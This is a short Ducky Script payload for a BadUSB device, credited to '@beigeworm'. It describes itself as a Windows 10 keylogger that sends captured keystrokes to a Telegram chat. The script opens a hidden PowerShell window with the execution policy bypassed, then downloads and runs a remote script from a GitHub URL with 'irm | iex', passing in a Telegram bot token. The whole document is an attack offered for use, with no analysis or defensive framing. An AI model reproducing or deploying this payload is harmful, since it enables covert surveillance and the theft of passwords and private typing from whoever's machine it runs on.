
REM Title: beigeworm's Keyloggger to Telegram Chat.
REM Author: @beigeworm
REM Description: This script logs all Keystrokes and posts results to a Telegram chat when the keyboard goes inactive for more than 10 secs.
REM Target: Windows 10

REM *SETUP*
REM replace TOKEN_HERE with your Telegram token.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Telegram-Keylogger/main.ps1 | iex
ENTER


